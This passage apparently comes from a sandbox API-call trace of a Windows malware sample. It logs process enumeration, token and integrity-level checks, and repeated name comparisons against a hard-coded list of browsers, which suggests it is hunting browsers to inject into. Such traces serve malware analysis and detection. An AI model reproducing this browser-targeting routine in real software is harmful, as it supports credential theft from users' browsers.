ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0498.602] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0498.602] GetLastError () returned 0x7a [0498.602] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0498.602] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0498.602] CloseHandle (hObject=0x3bc) returned 1 [0498.602] CloseHandle (hObject=0x5a4) returned 1 [0498.602] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0498.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0498.602] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3768e8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¥") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0498.602] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0498.602] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0498.602] GetLastError () returned 0x7a [0498.602] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0498.603] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0498.603] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0498.603] CloseHandle (hObject=0x3bc) returned 1 [0498.603] CloseHandle (hObject=0x5a4) returned 1 [0498.603] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0498.603] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0498.603] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0498.603] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0498.603] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0498.603] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0498.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0498.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0498.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0498.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0498.603] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0498.603] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0498.603] GetLastError () returned 0x7a [0498.603] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0498.603] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0498.603] CloseHandle (hObject=0x3bc) returned 1 [0498.603] CloseHandle (hObject=0x5a4) returned 1 [0498.603] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0498.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0498.603] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376c90, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¦") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0498.603] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0498.603] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0498.603] GetLastError () returned 0x7a [0498.603] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0498.603] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0498.603] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0498.603] CloseHandle (hObject=0x3bc) returned 1 [0498.603] CloseHandle (hObject=0x5a4) returned 1 [0498.603] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0498.603] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0498.603] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0498.603] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0498.603] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0498.603] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0498.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0498.604] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0498.604] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0500.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa338) returned 0xc0000004 [0500.612] VirtualAlloc (lpAddress=0x0, dwSize=0xb338, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0500.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb338, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0500.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0500.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0500.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0500.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0500.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0500.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0500.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0500.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0500.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0500.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0500.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0500.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0500.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0500.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0500.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0500.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0500.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0500.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0500.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0500.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0500.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0500.616] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0500.616] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0500.616] GetLastError () returned 0x7a [0500.616] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0500.616] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0500.616] CloseHandle (hObject=0x3bc) returned 1 [0500.616] CloseHandle (hObject=0x5a4) returned 1 [0500.616] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0500.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0500.616] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377da8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">§") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0500.616] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0500.616] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0500.616] GetLastError () returned 0x7a [0500.616] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0500.616] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0500.616] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0500.616] CloseHandle (hObject=0x3bc) returned 1 [0500.616] CloseHandle (hObject=0x5a4) returned 1 [0500.617] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0500.617] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0500.617] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0500.617] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0500.617] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0500.617] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0500.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0500.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0500.617] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0500.617] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0500.617] GetLastError () returned 0x7a [0500.617] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0500.617] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0500.617] CloseHandle (hObject=0x3bc) returned 1 [0500.617] CloseHandle (hObject=0x5a4) returned 1 [0500.617] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0500.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0500.617] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375aa0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¨") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0500.617] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0500.617] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0500.617] GetLastError () returned 0x7a [0500.617] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0500.617] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0500.617] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0500.617] CloseHandle (hObject=0x3bc) returned 1 [0500.617] CloseHandle (hObject=0x5a4) returned 1 [0500.617] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0500.617] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0500.617] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0500.617] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0500.617] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0500.617] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0500.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0500.617] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0500.617] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0500.617] GetLastError () returned 0x7a [0500.617] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0500.617] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0500.617] CloseHandle (hObject=0x3bc) returned 1 [0500.617] CloseHandle (hObject=0x5a4) returned 1 [0500.618] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0500.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0500.618] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376260, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">©") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0500.618] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0500.618] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0500.618] GetLastError () returned 0x7a [0500.618] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0500.618] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0500.618] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0500.618] CloseHandle (hObject=0x3bc) returned 1 [0500.618] CloseHandle (hObject=0x5a4) returned 1 [0500.618] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0500.618] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0500.618] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0500.618] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0500.618] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0500.618] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0500.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0500.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0500.618] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0500.618] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0500.618] GetLastError () returned 0x7a [0500.618] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0500.618] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0500.618] CloseHandle (hObject=0x3bc) returned 1 [0500.618] CloseHandle (hObject=0x5a4) returned 1 [0500.618] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0500.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0500.618] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3768a8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">ª") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0500.618] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0500.618] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0500.618] GetLastError () returned 0x7a [0500.618] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0500.618] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0500.618] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0500.618] CloseHandle (hObject=0x3bc) returned 1 [0500.618] CloseHandle (hObject=0x5a4) returned 1 [0500.618] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0500.619] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0500.619] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0500.619] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0500.619] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0500.619] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0500.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0500.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0500.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0500.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0500.619] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0500.619] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0500.619] GetLastError () returned 0x7a [0500.619] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0500.619] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0500.619] CloseHandle (hObject=0x3bc) returned 1 [0500.619] CloseHandle (hObject=0x5a4) returned 1 [0500.619] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0500.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0500.619] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376c50, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">«") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 